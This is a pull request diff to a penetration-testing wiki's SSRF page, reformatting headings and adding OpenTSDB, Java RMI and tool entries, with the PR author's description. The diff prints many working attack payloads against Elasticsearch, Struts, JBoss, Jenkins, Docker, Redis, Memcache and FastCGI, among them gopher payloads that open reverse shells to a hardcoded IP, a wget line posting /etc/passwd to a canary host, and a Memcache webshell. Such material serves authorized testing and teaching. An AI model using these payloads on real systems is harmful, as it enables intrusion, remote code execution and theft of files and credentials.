### PR TITLE
Update SSRF documentation

### DIFF
--- a/pentesting-web/ssrf-server-side-request-forgery.md
+++ b/pentesting-web/ssrf-server-side-request-forgery.md
@@ -548,7 +548,9 @@ You can use [https://github.com/teknogeek/ssrf-sheriff](https://github.com/tekno
 
 This section was copied from [https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)
 
-### Elasticsearch <a href="#elasticsearch" id="elasticsearch"></a>
+<div id="elasticsearch"></div>
+
+## Elasticsearch
 
 **Commonly bound port: 9200**
 
@@ -556,7 +558,7 @@ When Elasticsearch is deployed internally, it usually does not require authentic
 
 If you have a partially blind SSRF where you can determine the status code, check to see if the following endpoints return a 200:
 
-```
+```http
 /_cluster/health
 /_cat/indices
 /_cat/health
@@ -566,20 +568,22 @@ If you have a blind SSRF where you can send POST requests, you can shut down the
 
 Note: the `_shutdown` API has been removed from Elasticsearch version 2.x. and up. This only works in Elasticsearch 1.6 and below:
 
-```
+```http
 /_shutdown
 /_cluster/nodes/_master/_shutdown
 /_cluster/nodes/_shutdown
 /_cluster/nodes/_all/_shutdown
 ```
 
-### Weblogic <a href="#weblogic" id="weblogic"></a>
+<div id="weblogic"></div>
+
+## Weblogic
 
 **Commonly bound ports: 80, 443 (SSL), 7001, 8888**
 
 **SSRF Canary: UDDI Explorer (CVE-2014-4210)**
 
-```
+```http
 POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1
 Host: target.com
 Content-Length: 137
@@ -590,7 +594,7 @@ operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey
 
 This also works via GET:
 
-```
+```bash
 http://target.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
 ```
 
@@ -631,7 +635,7 @@ Taken from [here](https://forum.90sec.com/t/topic/1412).
 
 Linux:
 
-```
+```http
 POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
 Host: vulnerablehost:7001
 Upgrade-Insecure-Requests: 1
@@ -648,7 +652,7 @@ _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.su
 
 Windows:
 
-```
+```http
 POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
 Host: vulnerablehost:7001
 Upgrade-Insecure-Requests: 1
@@ -663,13 +667,17 @@ Content-Length: 117
 _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://SSRF_CANARY/poc.xml")
 ```
 
-### Hashicorp Consul <a href="#hashicorp-consul" id="hashicorp-consul"></a>
+<div id="consul"></div>
+
+## Hashicorp Consul
 
 **Commonly bound ports: 8500, 8501 (SSL)**
 
 Writeup can be found [here](https://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html).
 
-### Shellshock <a href="#shellshock" id="shellshock"></a>
+<div id="shellshock"></div>
+
+## Shellshock
 
 **Commonly bound ports: 80, 443 (SSL), 8080**
 
@@ -681,11 +689,13 @@ Short list of CGI paths to test:
 
 **SSRF Canary: Shellshock via User Agent**
 
-```
+```bash
 User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ;  curl SSRF_CANARY
 ```
 
-### Apache Druid <a href="#apache-druid" id="apache-druid"></a>
+<div id="druid"></div>
+
+## Apache Druid
 
 **Commonly bound ports: 80, 8080, 8888, 8082**
 
@@ -693,7 +703,7 @@ See the API reference for Apache Druid [here](https://druid.apache.org/docs/late
 
 If you can view the status code, check the following paths to see if they return a 200 status code:
 
-```
+```bash
 /status/selfDiscovered/status
 /druid/coordinator/v1/leader
 /druid/coordinator/v1/metadata/datasources
@@ -702,27 +712,31 @@ If you can view the status code, check the following paths to see if they return
 
 Shutdown tasks, requires you to guess task IDs or the datasource name:
 
-```
+```bash
 /druid/indexer/v1/task/{taskId}/shutdown
 /druid/indexer/v1/datasources/{dataSource}/shutdownAllTasks
 ```
 
 Shutdown supervisors on Apache Druid Overlords:
 
-```
+```bash
 /druid/indexer/v1/supervisor/terminateAll
 /druid/indexer/v1/supervisor/{supervisorId}/shutdown
 ```
 
-### Apache Solr <a href="#apache-solr" id="apache-solr"></a>
+<div id="solr"></div>
+
+## Apache Solr
 
 **Commonly bound port: 8983**
 
 **SSRF Canary: Shards Parameter**
 
+<blockquote class="twitter-tweet" data-conversation="none" data-theme="dark"><p lang="en" dir="ltr">To add to what shubham is saying - scanning for solr is relatively easy. There is a shards= param which allows you to bounce SSRF to SSRF to verify you are hitting a solr instance blindly.</p>&mdash; Хавиж Наффи 🥕 (@nnwakelam) <a href="https://twitter.com/nnwakelam/status/1349298311853821956?ref_src=twsrc%5Etfw">January 13, 2021</a></blockquote>
+
 Taken from [here](https://github.com/veracode-research/solr-injection).
 
-```
+```bash
 /search?q=Apple&shards=http://SSRF_CANARY/solr/collection/config%23&stream.body={"set-property":{"xxx":"yyy"}}
 /solr/db/select?q=orange&shards=http://SSRF_CANARY/solr/atom&qt=/select?fl=id,name:author&wt=json
 /xxx?q=aaa%26shards=http://SSRF_CANARY/solr 
@@ -733,7 +747,7 @@ Taken from [here](https://github.com/veracode-research/solr-injection).
 
 [Apache Solr 7.0.1 XXE (Packetstorm)](https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html)
 
-```
+```bash
 /solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://SSRF_CANARY/xxx"'><a></a>'
 /xxx?q={!type=xmlparser v="<!DOCTYPE a SYSTEM 'http://SSRF_CANARY/solr'><a></a>"}
 ```
@@ -742,7 +756,9 @@ Taken from [here](https://github.com/veracode-research/solr-injection).
 
 [Research on RCE via dataImportHandler](https://github.com/veracode-research/solr-injection#3-cve-2019-0193-remote-code-execution-via-dataimporthandler)
 
-### PeopleSoft <a href="#peoplesoft" id="peoplesoft"></a>
+<div id="peoplesoft"></div>
+
+## PeopleSoft
 
 **Commonly bound ports: 80,443 (SSL)**
 
@@ -750,7 +766,7 @@ Taken from this research [here](https://www.ambionics.io/blog/oracle-peoplesoft-
 
 **SSRF Canary: XXE #1**
 
-```
+```http
 POST /PSIGW/HttpListeningConnector HTTP/1.1
 Host: website.com
 Content-Type: application/xml
@@ -788,7 +804,7 @@ Content-Type: application/xml
 
 **SSRF Canary: XXE #2**
 
-```
+```http
 POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
 Host: website.com
 Content-Type: application/xml
@@ -797,7 +813,9 @@ Content-Type: application/xml
 <!DOCTYPE a PUBLIC "-//B/A/EN" "http://SSRF_CANARY">
 ```
 
-### Apache Struts <a href="#apache-struts" id="apache-struts"></a>
+<div id="struts"></div>
+
+## Apache Struts
 
 **Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
 
@@ -807,13 +825,13 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
 
 Append this to the end of every internal endpoint/URL you know of:
 
-```
-
+```http
 ?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SSRF_CANARY/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
-
 ```
 
-### JBoss <a href="#jboss" id="jboss"></a>
+<div id="jboss"></div>
+
+## JBoss
 
 **Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
 
@@ -821,17 +839,19 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
 
 **SSRF Canary: Deploy WAR from URL**
 
-```
+```bash
 /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://SSRF_CANARY/utils/cmd.war
 ```
 
-### Confluence <a href="#confluence" id="confluence"></a>
+<div id="confluence"></div>
+
+## Confluence
 
 **Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
 
-**SSRF Canary: Sharelinks (Confluence versions released from 2016 November and older)**
+**SSRF Canary: Sharelinks  (Confluence versions released from 2016 November and older)**
 
-```
+```bash
 /rest/sharelinks/1.0/link?url=https://SSRF_CANARY/
 ```
 
@@ -839,11 +859,14 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
 
 [Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344)
 
-```
+```bash
 /plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
 ```
 
-### Jira <a href="#jira" id="jira"></a>
+
+<div id="jira"></div>
+
+## Jira
 
 **Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
 
@@ -851,7 +874,7 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
 
 [Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344)
 
-```
+```bash
 /plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
 ```
 
@@ -859,29 +882,32 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
 
 [Atlassian Security Ticket JRASERVER-69793](https://jira.atlassian.com/browse/JRASERVER-69793)
 
-```
+```bash
 /plugins/servlet/gadgets/makeRequest?url=https://SSRF_CANARY:443@example.com
 ```
 
-### Other Atlassian Products <a href="#other-atlassian-products" id="other-atlassian-products"></a>
+<div id="atlassian-products"></div>
+
+## Other Atlassian Products
 
 **Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
 
 **SSRF Canary: iconUriServlet (CVE-2017-9506)**:
-
-* Bamboo < 6.0.0
-* Bitbucket < 4.14.4
-* Crowd < 2.11.2
-* Crucible < 4.3.2
-* Fisheye < 4.3.2
+- Bamboo < 6.0.0
+- Bitbucket < 4.14.4
+- Crowd < 2.11.2
+- Crucible < 4.3.2
+- Fisheye < 4.3.2
 
 [Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344)
 
-```
+```bash
 /plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
 ```
 
-### OpenTSDB <a href="#opentsdb" id="opentsdb"></a>
+<div id="opentsdb"></div>
+
+## OpenTSDB
 
 **Commonly bound port: 4242**
 
@@ -889,11 +915,21 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
 
 **SSRF Canary: curl via RCE**
 
-```
+```bash
 /q?start=2016/04/13-10:21:00&ignore=2&m=sum:jmxdata.cpu&o=&yrange=[0:]&key=out%20right%20top&wxh=1900x770%60curl%20SSRF_CANARY%60&style=linespoint&png
 ```
 
-### Jenkins <a href="#jenkins" id="jenkins"></a>
+[OpenTSDB 2.4.0 Remote Code Execution](https://github.com/OpenTSDB/opentsdb/issues/2051)
+
+**SSRF Canary: curl via RCE - CVE-2020-35476**
+
+```bash
+/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('wget%20--post-file%20/etc/passwd%20SSRF_CANARY')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
+```
+
+<div id="jenkins"></div>
+
+## Jenkins
 
 **Commonly bound ports: 80,443 (SSL),8080,8888**
 
@@ -901,7 +937,7 @@ Great writeup [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-
 
 **SSRF Canary: CVE-2018-1000600**
 
-```
+```bash
 /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://SSRF_CANARY/%23&login=orange&password=tsai
 ```
 
@@ -909,19 +945,21 @@ Great writeup [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-
 
 Follow the instructions here to achieve RCE via GET: [Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html)
 
-```
+```bash
 /org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='orange.tw', root='http://SSRF_CANARY/')%0a@Grab(group='tw.orange', module='poc', version='1')%0aimport Orange;
 ```
 
 **RCE via Groovy**
 
-```bash
+```
 cmd = 'curl burp_collab'
 pay = 'public class x {public x(){"%s".execute()}}' % cmd
 data = 'http://jenkins.internal/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=' + urllib.quote(pay)
 ```
 
-### Hystrix Dashboard <a href="#hystrix-dashboard" id="hystrix-dashboard"></a>
+<div id="hystrix"></div>
+
+## Hystrix Dashboard
 
 **Commonly bound ports: 80,443 (SSL),8080**
 
@@ -929,11 +967,13 @@ Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1
 
 **SSRF Canary: CVE-2020-5412**
 
-```
+```bash
 /proxy.stream?origin=http://SSRF_CANARY/
 ```
 
-### W3 Total Cache <a href="#w3-total-cache" id="w3-total-cache"></a>
+<div id="w3"></div>
+
+## W3 Total Cache
 
 **Commonly bound ports: 80,443 (SSL)**
 
@@ -943,9 +983,9 @@ W3 Total Cache 0.9.2.6-0.9.3
 
 This needs to be a PUT request:
 
-```
+```bash
 PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
-Host: 
+Host: {{Hostname}}
 Accept: */*
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36
 Content-Length: 124
@@ -957,7 +997,7 @@ Connection: close
 
 **SSRF Canary**
 
-The advisory for this vulnerability was released here: [W3 Total Cache SSRF vulnerability](https://klikki.fi/adv/w3\_total\_cache.html)
+The advisory for this vulnerability was released here: [W3 Total Cache SSRF vulnerability](https://klikki.fi/adv/w3_total_cache.html)
 
 This PHP code will generate a payload for your SSRF Canary host (replace `url` with your canary host):
 
@@ -973,13 +1013,13 @@ echo($req);
 ?>
 ```
 
-### Docker <a href="#docker" id="docker"></a>
+## Docker
 
 **Commonly bound ports: 2375, 2376 (SSL)**
 
-If you have a partially blind SSRF, you can use the following paths to verify the presence of Docker’s API:
+If you have a partially blind SSRF, you can use the following paths to verify the presence of Docker's API:
 
-```
+```bash
 /containers/json
 /secrets
 /services
@@ -987,7 +1027,7 @@ If you have a partially blind SSRF, you can use the following paths to verify th
 
 **RCE via running an arbitrary docker image**
 
-```
+```http
 POST /containers/create?name=test HTTP/1.1
 Host: website.com
 Content-Type: application/json
@@ -998,30 +1038,34 @@ Content-Type: application/json
 
 Replace alpine with an arbitrary image you would like the docker container to run.
 
-### Gitlab Prometheus Redis Exporter <a href="#gitlab-prometheus-redis-exporter" id="gitlab-prometheus-redis-exporter"></a>
+## Gitlab Prometheus Redis Exporter
 
 **Commonly bound ports: 9121**
 
-This vulnerability affects Gitlab instances before version 13.1.1. According to the [Gitlab documentation](https://docs.gitlab.com/ee/administration/monitoring/prometheus/#configuring-prometheus) `Prometheus and its exporters are on by default, starting with GitLab 9.0.`
+This vulnerability affects Gitlab instances before version 13.1.1. According to the [Gitlab documentation](https://docs.gitlab.com/ee/administration/monitoring/prometheus/#configuring-prometheus) `Prometheus and its exporters are on by default, starting with GitLab 9.0. `
 
-These exporters provide an excellent method for an attacker to pivot and attack other services using CVE-2020-13379. One of the exporters which is easily exploited is the Redis Exporter.
+These exporters provide an excellent method for an attacker to pivot and attack other services using CVE-2020-13379. One of the exporters which is easily exploited is the Redis Exporter. 
 
 The following endpoint will allow an attacker to dump all the keys in the redis server provided via the target parameter:
 
-```
+```bash
 http://localhost:9121/scrape?target=redis://127.0.0.1:7001&check-keys=*
 ```
 
+----------
+
 **Possible via Gopher**
 
-### Redis <a href="#redis" id="redis"></a>
+<div id="redis"></div>
+
+## Redis
 
 **Commonly bound port: 6379**
 
 Recommended reading:
 
-* [Trying to hack Redis via HTTP requests](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html)
-* [SSRF Exploits against Redis](https://maxchadwick.xyz/blog/ssrf-exploits-against-redis)
+- [Trying to hack Redis via HTTP requests](https://www.agarri.fr/blog/archives/2014/09/11/trying_to_hack_redis_via_http_requests/index.html)
+- [SSRF Exploits against Redis](https://maxchadwick.xyz/blog/ssrf-exploits-against-redis)
 
 **RCE via Cron** - [Gopher Attack Surfaces](https://blog.chaitin.cn/gopher-attack-surfaces/)
 
@@ -1035,7 +1079,7 @@ redis-cli -h $1 save
 
 Gopher:
 
-```
+```bash
 gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
 ```
 
@@ -1079,7 +1123,7 @@ if __name__=="__main__":
     print payload
 ```
 
-**RCE via authorized\_keys** - [Redis Getshell Summary](https://www.mdeditor.tw/pl/pBy0)
+**RCE via authorized_keys** - [Redis Getshell Summary](https://www.mdeditor.tw/pl/pBy0)
 
 ```python
 import urllib
@@ -1122,24 +1166,28 @@ Great writeup from Liveoverflow [here](https://liveoverflow.com/gitlab-11-4-7-re
 
 While this required authenticated access to GitLab to exploit, I am including the payload here as the `git` protocol may work on the target you are hacking. This payload is for reference.
 
-```
+```bash
 git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git
 ```
 
-### Memcache <a href="#memcache" id="memcache"></a>
+<div id="memcache"></div>
+
+## Memcache
 
 **Commonly bound port: 11211**
 
-* [vBulletin Memcache RCE](https://www.exploit-db.com/exploits/37815)
-* [GitHub Enterprise Memcache RCE](https://www.exploit-db.com/exploits/42392)
-* [Example Gopher payload for Memcache](https://blog.safebuff.com/2016/07/03/SSRF-Tips/#SSRF-memcache-Getshell)
+- [vBulletin Memcache RCE](https://www.exploit-db.com/exploits/37815)
+- [GitHub Enterprise Memcache RCE](https://www.exploit-db.com/exploits/42392)
+- [Example Gopher payload for Memcache](https://blog.safebuff.com/2016/07/03/SSRF-Tips/#SSRF-memcache-Getshell)
 
 ```bash
 gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64_decode($_POST[ccc]));";}}s:13:"rewritestatus";i:1;}%0d%0a
 gopher://192.168.10.12:11211/_%0d%0adelete ssrftest%0d%0a
 ```
 
-### Apache Tomcat <a href="#apache-tomcat" id="apache-tomcat"></a>
+<div id="tomcat"></div>
+
+## Apache Tomcat
 
 **Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
 
@@ -1151,7 +1199,10 @@ CTF writeup using this technique:
 
 [From XXE to RCE: Pwn2Win CTF 2018 Writeup](https://bookgin.tw/2018/12/04/from-xxe-to-rce-pwn2win-ctf-2018-writeup/)
 
-### FastCGI <a href="#fastcgi" id="fastcgi"></a>
+
+<div id="fastcgi"></div>
+
+## FastCGI
 
 **Commonly bound ports: 80,443 (SSL)**
 
@@ -1161,30 +1212,69 @@ This was taken from [here](https://blog.chaitin.cn/gopher-attack-surfaces/).
 gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/172.19.23.228/2333%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00
 ```
 
+<div id="java-rmi"></div>
+
+## Java RMI
+
+**Commonly bound ports: 1090,1098,1099,1199,4443-4446,8999-9010,9999**
+
+Blind *SSRF* vulnerabilities that allow arbitrary bytes (*gopher based*) can be used to perform deserialization or
+codebase attacks on the *Java RMI* default components (*RMI Registry*, *Distributed Garbage Collector*, *Activation System*).
+A detailed writeup can be found [here](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/). The following listing
+shows an example for the payload generation:
+
+```console
+$ rmg serial 127.0.0.1 1090 CommonsCollections6 'curl example.burpcollaborator.net' --component reg --ssrf --gopher
+[+] Creating ysoserial payload... done.
+[+]
+[+] Attempting deserialization attack on RMI Registry endpoint...
+[+]
+[+] 	SSRF Payload: gopher://127.0.0.1:1090/_%4a%52%4d%49%00%02%4c%50%ac%ed%00%05%77%22%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%02%44%15%4d[...]
+```
+
+-------------------
+
 **Tools**
 
-### Gopherus <a href="#gopherus" id="gopherus"></a>
+<div id="gopherus"></div>
 
-* [Gopherus - Github](https://github.com/tarunkant/Gopherus)
-* [Blog post on Gopherus](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)
+## Gopherus
+
+- [Gopherus - Github](https://github.com/tarunkant/Gopherus)
+- [Blog post on Gopherus](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)
 
 This tool generates Gopher payloads for:
 
-* MySQL
-* PostgreSQL
-* FastCGI
-* Redis
-* Zabbix
-* Memcache
+- MySQL
+- PostgreSQL
+- FastCGI
+- Redis
+- Zabbix
+- Memcache
 
-### SSRF Proxy <a href="#ssrf-proxy" id="ssrf-proxy"></a>
 
-* [SSRF Proxy](https://github.com/bcoles/ssrf\_proxy)
+<div id="remote-method-guesser"></div>
+
+## remote-method-guesser
+
+- [remote-method-guesser - Github](https://github.com/qtc-de/remote-method-guesser)
+- [Blog post on SSRF usage](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/)
+
+*remote-method-guesser* is a *Java RMI* vulnerability scanner that supports attack operations for most common *Java RMI*
+vulnerabilities. Most of the available operations support the ``--ssrf`` option, to generate an *SSRF* payload for the
+requested operation. Together with the ``--gopher`` option, ready to use *gopher* payloads can be generated directly.
+
+
+<div id="ssrfproxy"></div>
+
+## SSRF Proxy
+
+- [SSRF Proxy](https://github.com/bcoles/ssrf_proxy)
 
 SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).
+
 
 ## References
 
 * [https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4](https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4)
 * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery)
-

--- a/pentesting-web/ssrf-server-side-request-forgery.md
+++ b/pentesting-web/ssrf-server-side-request-forgery.md
@@ -210,8 +210,9 @@ ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
 
 ### Gopher://
 
-Using this protocol you can specify the **ip, port and bytes** you want the listener to **send**. Then, you can basically exploit a SSRF to **communicate with any TCP server** (but you need to know how to talk to the service first).\
-Fortunately, you can use [https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus) to already create payloads for several services.
+Using this protocol you can specify the **IP, port and bytes** you want the server to **send**. Then, you can basically exploit a SSRF to **communicate with any TCP server** (but you need to know how to talk to the service first).\
+Fortunately, you can use [Gopherus](https://github.com/tarunkant/Gopherus) to create payloads for several services. Additionally, [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
+can be used to create *gopher* payloads for *Java RMI* services.
 
 #### Gopher smtp&#x20;
 


### PR DESCRIPTION
Hi there :wave:

the documentation on *SSRF* attacks depends on the list of blind *SSRF* chains from [assetnote](https://github.com/assetnote/blind-ssrf-chains). The list contained in hacktricks was outdated and did not contain all of the current examples. Furthermore, there were several formatting changes.

Regarding the formatting changes I'm not sure whether these were implemented intentionally and manually by the hacktricks maintainers. From my point of view it would make sense to keep the format of the list as close as possible to the orignal one from assetnote. This enables updates of the list by simply applying copy and paste. If this is not possible, one should think about just providing a reference instead of using a copy of the list :thinking: 